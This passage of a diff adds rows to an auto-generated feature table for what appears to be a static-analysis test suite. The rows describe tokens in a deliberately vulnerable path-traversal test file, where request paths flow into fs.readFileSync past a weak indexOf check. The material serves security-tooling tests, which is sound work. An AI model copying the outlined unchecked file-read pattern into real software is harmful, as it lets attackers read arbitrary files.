enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:358:32:358:35 | join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:358:37:358:44 | rootPath | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/normalizedPaths.js:358:37:358:44 | rootPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:358:37:358:44 | rootPath | calleeImports | path | @@ -9561,6 +78739,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:358:47:358:50 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:358:47:358:50 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:358:47:358:50 | path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:360:7:360:16 | targetPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:360:7:360:16 | targetPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:360:7:360:16 | targetPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:360:7:360:16 | targetPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:360:7:360:16 | targetPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:360:7:360:16 | targetPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:360:7:360:16 | targetPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:360:7:360:16 | targetPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:360:7:360:16 | targetPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:360:7:360:16 | targetPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:361:7:361:39 | !allowP ... otPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:361:7:361:39 | !allowP ... otPath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:361:7:361:39 | !allowP ... otPath) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:361:7:361:39 | !allowP ... otPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:361:7:361:39 | !allowP ... otPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:16 | allowPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:16 | allowPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:16 | allowPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:16 | allowPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:16 | allowPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:39 | allowPa ... otPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:39 | allowPa ... otPath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:39 | allowPa ... otPath) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:39 | allowPa ... otPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:39 | allowPa ... otPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:39 | exceptional return of allowPa ... otPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:39 | exceptional return of allowPa ... otPath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:39 | exceptional return of allowPa ... otPath) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:39 | exceptional return of allowPa ... otPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:361:8:361:39 | exceptional return of allowPa ... otPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:361:18:361:28 | requestPath | CalleeFlexibleAccessPath | allowPath | | autogenerated/TaintedPath/normalizedPaths.js:361:18:361:28 | requestPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:361:18:361:28 | requestPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -9575,6 +78783,51 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:361:31:361:38 | rootPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | | autogenerated/TaintedPath/normalizedPaths.js:361:31:361:38 | rootPath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:361:31:361:38 | rootPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:14 | targetPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:14 | targetPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:14 | targetPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:14 | targetPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:14 | targetPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetP ... ootPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetP ... ootPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetP ... ootPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetP ... ootPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetP ... ootPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:362:18:362:25 | rootPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:362:18:362:25 | rootPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:362:18:362:25 | rootPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:362:18:362:25 | rootPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:362:18:362:25 | rootPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:6 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:19 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:32 | exceptional return of fs.read ... stPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:32 | exceptional return of fs.read ... stPath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:32 | exceptional return of fs.read ... stPath) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:32 | exceptional return of fs.read ... stPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:32 | exceptional return of fs.read ... stPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:32 | fs.read ... stPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:32 | fs.read ... stPath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:32 | fs.read ... stPath) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:32 | fs.read ... stPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:363:5:363:32 | fs.read ... stPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:363:8:363:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:363:8:363:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:363:8:363:19 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:363:8:363:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:363:8:363:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:363:21:363:31 | requestPath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:363:21:363:31 | requestPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:363:21:363:31 | requestPath | calleeImports | fs | @@ -9584,6 +78837,51 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:363:21:363:31 | requestPath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:363:21:363:31 | requestPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:363:21:363:31 | requestPath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:14 | targetPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:14 | targetPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:14 | targetPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:14 | targetPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:14 | targetPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:28 | targetP ... estPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:28 | targetP ... estPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:28 | targetP ... estPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:28 | targetP ... estPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:28 | targetP ... estPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:28 | targetPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:28 | targetPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:28 | targetPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:28 | targetPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:365:5:365:28 | targetPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:365:18:365:28 | requestPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:365:18:365:28 | requestPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:365:18:365:28 | requestPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:365:18:365:28 | requestPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:365:18:365:28 | requestPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:6 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:19 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:32 | exceptional return of fs.read ... stPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:32 | exceptional return of fs.read ... stPath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:32 | exceptional return of fs.read ... stPath) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:32 | exceptional return of fs.read ... stPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:32 | exceptional return of fs.read ... stPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:32 | fs.read ... stPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:32 | fs.read ... stPath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:32 | fs.read ... stPath) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:32 | fs.read ... stPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:366:5:366:32 | fs.read ... stPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:366:8:366:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:366:8:366:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:366:8:366:19 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:366:8:366:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:366:8:366:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:366:21:366:31 | requestPath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:366:21:366:31 | requestPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:366:21:366:31 | requestPath | calleeImports | fs | @@ -9593,6 +78891,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:366:21:366:31 | requestPath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:366:21:366:31 | requestPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:366:21:366:31 | requestPath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:3 | targetPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:3 | targetPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:3 | targetPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:3 | targetPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:3 | targetPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:4 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:29 | exceptional return of fs.read ... etPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:29 | exceptional return of fs.read ... etPath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:29 | exceptional return of fs.read ... etPath) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:29 | exceptional return of fs.read ... etPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:29 | exceptional return of fs.read ... etPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:29 | fs.read ... etPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:29 | fs.read ... etPath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:29 | fs.read ... etPath) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:29 | fs.read ... etPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:368:3:368:29 | fs.read ... etPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:368:6:368:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:368:6:368:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:368:6:368:17 | readFileSync | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:368:6:368:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:368:6:368:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:368:19:368:28 | targetPath | CalleeFlexibleAccessPath | 